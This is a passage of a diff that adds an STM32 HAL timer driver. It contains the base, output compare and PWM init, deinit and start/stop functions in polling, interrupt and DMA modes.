parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + assert_param(IS_TIM_COUNTER_MODE(htim->Init.CounterMode)); + assert_param(IS_TIM_CLOCKDIVISION_DIV(htim->Init.ClockDivision)); + assert_param(IS_TIM_AUTORELOAD_PRELOAD(htim->Init.AutoReloadPreload)); + + if (htim->State == HAL_TIM_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + htim->Lock = HAL_UNLOCKED; + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + /* Reset interrupt callbacks to legacy weak callbacks */ + TIM_ResetCallback(htim); + + if (htim->Base_MspInitCallback == NULL) + { + htim->Base_MspInitCallback = HAL_TIM_Base_MspInit; + } + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + htim->Base_MspInitCallback(htim); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + HAL_TIM_Base_MspInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + + /* Set the TIM state */ + htim->State = HAL_TIM_STATE_BUSY; + + /* Set the Time Base configuration */ + TIM_Base_SetConfig(htim->Instance, &htim->Init); + + /* Initialize the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_READY; + + /* Initialize the TIM channels state */ + TIM_CHANNEL_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_READY); + + /* Initialize the TIM state*/ + htim->State = HAL_TIM_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the TIM Base peripheral + * @param htim TIM Base handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Base_DeInit(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + + htim->State = HAL_TIM_STATE_BUSY; + + /* Disable the TIM Peripheral Clock */ + __HAL_TIM_DISABLE(htim); + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + if (htim->Base_MspDeInitCallback == NULL) + { + htim->Base_MspDeInitCallback = HAL_TIM_Base_MspDeInit; + } + /* DeInit the low level hardware */ + htim->Base_MspDeInitCallback(htim); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC */ + HAL_TIM_Base_MspDeInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + /* Change the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_RESET; + + /* Change the TIM channels state */ + TIM_CHANNEL_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_N_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_RESET); + + /* Change TIM state */ + htim->State = HAL_TIM_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Initializes the TIM Base MSP. + * @param htim TIM Base handle + * @retval None + */ +__weak void HAL_TIM_Base_MspInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_Base_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes TIM Base MSP. + * @param htim TIM Base handle + * @retval None + */ +__weak void HAL_TIM_Base_MspDeInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_Base_MspDeInit could be implemented in the user file + */ +} + + +/** + * @brief Starts the TIM Base generation. + * @param htim TIM Base handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Base_Start(TIM_HandleTypeDef *htim) +{ + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + + /* Check the TIM state */ + if (htim->State != HAL_TIM_STATE_READY) + { + return HAL_ERROR; + } + + /* Set the TIM state */ + htim->State = HAL_TIM_STATE_BUSY; + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM Base generation. + * @param htim TIM Base handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Base_Stop(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM state */ + htim->State = HAL_TIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the TIM Base generation in interrupt mode. + * @param htim TIM Base handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Base_Start_IT(TIM_HandleTypeDef *htim) +{ + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + + /* Check the TIM state */ + if (htim->State != HAL_TIM_STATE_READY) + { + return HAL_ERROR; + } + + /* Set the TIM state */ + htim->State = HAL_TIM_STATE_BUSY; + + /* Enable the TIM Update interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_UPDATE); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM Base generation in interrupt mode. + * @param htim TIM Base handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Base_Stop_IT(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + + /* Disable the TIM Update interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_UPDATE); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM state */ + htim->State = HAL_TIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the TIM Base generation in DMA mode. + * @param htim TIM Base handle + * @param pData The source Buffer address. + * @param Length The length of data to be transferred from memory to peripheral. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Base_Start_DMA(TIM_HandleTypeDef *htim, uint32_t *pData, uint16_t Length) +{ + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_DMA_INSTANCE(htim->Instance)); + + /* Set the TIM state */ + if (htim->State == HAL_TIM_STATE_BUSY) + { + return HAL_BUSY; + } + else if (htim->State == HAL_TIM_STATE_READY) + { + if ((pData == NULL) && (Length > 0U)) + { + return HAL_ERROR; + } + else + { + htim->State = HAL_TIM_STATE_BUSY; + } + } + else + { + return HAL_ERROR; + } + + /* Set the DMA Period elapsed callbacks */ + htim->hdma[TIM_DMA_ID_UPDATE]->XferCpltCallback = TIM_DMAPeriodElapsedCplt; + htim->hdma[TIM_DMA_ID_UPDATE]->XferHalfCpltCallback = TIM_DMAPeriodElapsedHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_UPDATE]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_UPDATE], (uint32_t)pData, (uint32_t)&htim->Instance->ARR, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + + /* Enable the TIM Update DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_UPDATE); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM Base generation in DMA mode. + * @param htim TIM Base handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Base_Stop_DMA(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_DMA_INSTANCE(htim->Instance)); + + /* Disable the TIM Update DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_UPDATE); + + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_UPDATE]); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM state */ + htim->State = HAL_TIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup TIM_Exported_Functions_Group2 TIM Output Compare functions + * @brief TIM Output Compare functions + * +@verbatim + ============================================================================== + ##### TIM Output Compare functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the TIM Output Compare. + (+) De-initialize the TIM Output Compare. + (+) Start the TIM Output Compare. + (+) Stop the TIM Output Compare. + (+) Start the TIM Output Compare and enable interrupt. + (+) Stop the TIM Output Compare and disable interrupt. + (+) Start the TIM Output Compare and enable DMA transfer. + (+) Stop the TIM Output Compare and disable DMA transfer. + +@endverbatim + * @{ + */ +/** + * @brief Initializes the TIM Output Compare according to the specified + * parameters in the TIM_HandleTypeDef and initializes the associated handle. + * @note Switching from Center Aligned counter mode to Edge counter mode (or reverse) + * requires a timer reset to avoid unexpected direction + * due to DIR bit readonly in center aligned mode. + * Ex: call @ref HAL_TIM_OC_DeInit() before HAL_TIM_OC_Init() + * @param htim TIM Output Compare handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OC_Init(TIM_HandleTypeDef *htim) +{ + /* Check the TIM handle allocation */ + if (htim == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + assert_param(IS_TIM_COUNTER_MODE(htim->Init.CounterMode)); + assert_param(IS_TIM_CLOCKDIVISION_DIV(htim->Init.ClockDivision)); + assert_param(IS_TIM_AUTORELOAD_PRELOAD(htim->Init.AutoReloadPreload)); + + if (htim->State == HAL_TIM_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + htim->Lock = HAL_UNLOCKED; + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + /* Reset interrupt callbacks to legacy weak callbacks */ + TIM_ResetCallback(htim); + + if (htim->OC_MspInitCallback == NULL) + { + htim->OC_MspInitCallback = HAL_TIM_OC_MspInit; + } + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + htim->OC_MspInitCallback(htim); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC and DMA */ + HAL_TIM_OC_MspInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + + /* Set the TIM state */ + htim->State = HAL_TIM_STATE_BUSY; + + /* Init the base time for the Output Compare */ + TIM_Base_SetConfig(htim->Instance, &htim->Init); + + /* Initialize the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_READY; + + /* Initialize the TIM channels state */ + TIM_CHANNEL_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_READY); + + /* Initialize the TIM state*/ + htim->State = HAL_TIM_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the TIM peripheral + * @param htim TIM Output Compare handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OC_DeInit(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + + htim->State = HAL_TIM_STATE_BUSY; + + /* Disable the TIM Peripheral Clock */ + __HAL_TIM_DISABLE(htim); + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + if (htim->OC_MspDeInitCallback == NULL) + { + htim->OC_MspDeInitCallback = HAL_TIM_OC_MspDeInit; + } + /* DeInit the low level hardware */ + htim->OC_MspDeInitCallback(htim); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC and DMA */ + HAL_TIM_OC_MspDeInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + /* Change the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_RESET; + + /* Change the TIM channels state */ + TIM_CHANNEL_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_N_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_RESET); + + /* Change TIM state */ + htim->State = HAL_TIM_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Initializes the TIM Output Compare MSP. + * @param htim TIM Output Compare handle + * @retval None + */ +__weak void HAL_TIM_OC_MspInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_OC_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes TIM Output Compare MSP. + * @param htim TIM Output Compare handle + * @retval None + */ +__weak void HAL_TIM_OC_MspDeInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_OC_MspDeInit could be implemented in the user file + */ +} + +/** + * @brief Starts the TIM Output Compare signal generation. + * @param htim TIM Output Compare handle + * @param Channel TIM Channel to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OC_Start(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + /* Check the TIM channel state */ + if (TIM_CHANNEL_STATE_GET(htim, Channel) != HAL_TIM_CHANNEL_STATE_READY) + { + return HAL_ERROR; + } + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + + /* Enable the Output compare channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_ENABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Enable the main output */ + __HAL_TIM_MOE_ENABLE(htim); + } + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM Output Compare signal generation. + * @param htim TIM Output Compare handle + * @param Channel TIM Channel to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OC_Stop(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + /* Disable the Output compare channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_DISABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + } + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the TIM Output Compare signal generation in interrupt mode. + * @param htim TIM Output Compare handle + * @param Channel TIM Channel to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OC_Start_IT(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + /* Check the TIM channel state */ + if (TIM_CHANNEL_STATE_GET(htim, Channel) != HAL_TIM_CHANNEL_STATE_READY) + { + return HAL_ERROR; + } + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Enable the TIM Capture/Compare 1 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Enable the TIM Capture/Compare 2 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Enable the TIM Capture/Compare 3 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC3); + break; + } + + case TIM_CHANNEL_4: + { + /* Enable the TIM Capture/Compare 4 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC4); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Enable the Output compare channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_ENABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Enable the main output */ + __HAL_TIM_MOE_ENABLE(htim); + } + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + } + + /* Return function status */ + return status; +} + +/** + * @brief Stops the TIM Output Compare signal generation in interrupt mode. + * @param htim TIM Output Compare handle + * @param Channel TIM Channel to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OC_Stop_IT(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Disable the TIM Capture/Compare 1 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Disable the TIM Capture/Compare 2 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Disable the TIM Capture/Compare 3 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC3); + break; + } + + case TIM_CHANNEL_4: + { + /* Disable the TIM Capture/Compare 4 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC4); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Disable the Output compare channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_DISABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + } + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return status; +} + +/** + * @brief Starts the TIM Output Compare signal generation in DMA mode. + * @param htim TIM Output Compare handle + * @param Channel TIM Channel to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @param pData The source Buffer address. + * @param Length The length of data to be transferred from memory to TIM peripheral + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OC_Start_DMA(TIM_HandleTypeDef *htim, uint32_t Channel, uint32_t *pData, uint16_t Length) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + /* Set the TIM channel state */ + if (TIM_CHANNEL_STATE_GET(htim, Channel) == HAL_TIM_CHANNEL_STATE_BUSY) + { + return HAL_BUSY; + } + else if (TIM_CHANNEL_STATE_GET(htim, Channel) == HAL_TIM_CHANNEL_STATE_READY) + { + if ((pData == NULL) && (Length > 0U)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else + { + return HAL_ERROR; + } + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC1]->XferCpltCallback = TIM_DMADelayPulseCplt; + htim->hdma[TIM_DMA_ID_CC1]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC1]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC1], (uint32_t)pData, (uint32_t)&htim->Instance->CCR1, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + + /* Enable the TIM Capture/Compare 1 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC2]->XferCpltCallback = TIM_DMADelayPulseCplt; + htim->hdma[TIM_DMA_ID_CC2]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC2]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC2], (uint32_t)pData, (uint32_t)&htim->Instance->CCR2, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + + /* Enable the TIM Capture/Compare 2 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC3]->XferCpltCallback = TIM_DMADelayPulseCplt; + htim->hdma[TIM_DMA_ID_CC3]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC3]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC3], (uint32_t)pData, (uint32_t)&htim->Instance->CCR3, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Capture/Compare 3 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC3); + break; + } + + case TIM_CHANNEL_4: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC4]->XferCpltCallback = TIM_DMADelayPulseCplt; + htim->hdma[TIM_DMA_ID_CC4]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC4]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC4], (uint32_t)pData, (uint32_t)&htim->Instance->CCR4, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Capture/Compare 4 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC4); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Enable the Output compare channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_ENABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Enable the main output */ + __HAL_TIM_MOE_ENABLE(htim); + } + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + } + + /* Return function status */ + return status; +} + +/** + * @brief Stops the TIM Output Compare signal generation in DMA mode. + * @param htim TIM Output Compare handle + * @param Channel TIM Channel to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OC_Stop_DMA(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Disable the TIM Capture/Compare 1 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC1); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC1]); + break; + } + + case TIM_CHANNEL_2: + { + /* Disable the TIM Capture/Compare 2 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC2); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC2]); + break; + } + + case TIM_CHANNEL_3: + { + /* Disable the TIM Capture/Compare 3 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC3); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC3]); + break; + } + + case TIM_CHANNEL_4: + { + /* Disable the TIM Capture/Compare 4 interrupt */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC4); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC4]); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Disable the Output compare channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_DISABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + } + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return status; +} + +/** + * @} + */ + +/** @defgroup TIM_Exported_Functions_Group3 TIM PWM functions + * @brief TIM PWM functions + * +@verbatim + ============================================================================== + ##### TIM PWM functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the TIM PWM. + (+) De-initialize the TIM PWM. + (+) Start the TIM PWM. + (+) Stop the TIM PWM. + (+) Start the TIM PWM and enable interrupt. + (+) Stop the TIM PWM and disable interrupt. + (+) Start the TIM PWM and enable DMA transfer. + (+) Stop the TIM PWM and disable DMA transfer. + +@endverbatim + * @{ + */ +/** + * @brief Initializes the TIM PWM Time Base according to the specified + * parameters in the TIM_HandleTypeDef and initializes the associated handle. + * @note Switching from Center Aligned counter mode to Edge counter mode (or reverse) + * requires a timer reset to avoid unexpected direction + * due to DIR bit readonly in center aligned mode. + * Ex: call @ref HAL_TIM_PWM_DeInit() before HAL_TIM_PWM_Init() + * @param htim TIM PWM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_PWM_Init(TIM_HandleTypeDef *htim) +{ + /* Check the TIM handle allocation */ + if (htim == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + assert_param(IS_TIM_COUNTER_MODE(htim->Init.CounterMode)); + assert_param(IS_TIM_CLOCKDIVISION_DIV(htim->Init.ClockDivision)); + assert_param(IS_TIM_AUTORELOAD_PRELOAD(htim->Init.AutoReloadPreload)); + + if (htim->State == HAL_TIM_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + htim->Lock = HAL_UNLOCKED; + +#if 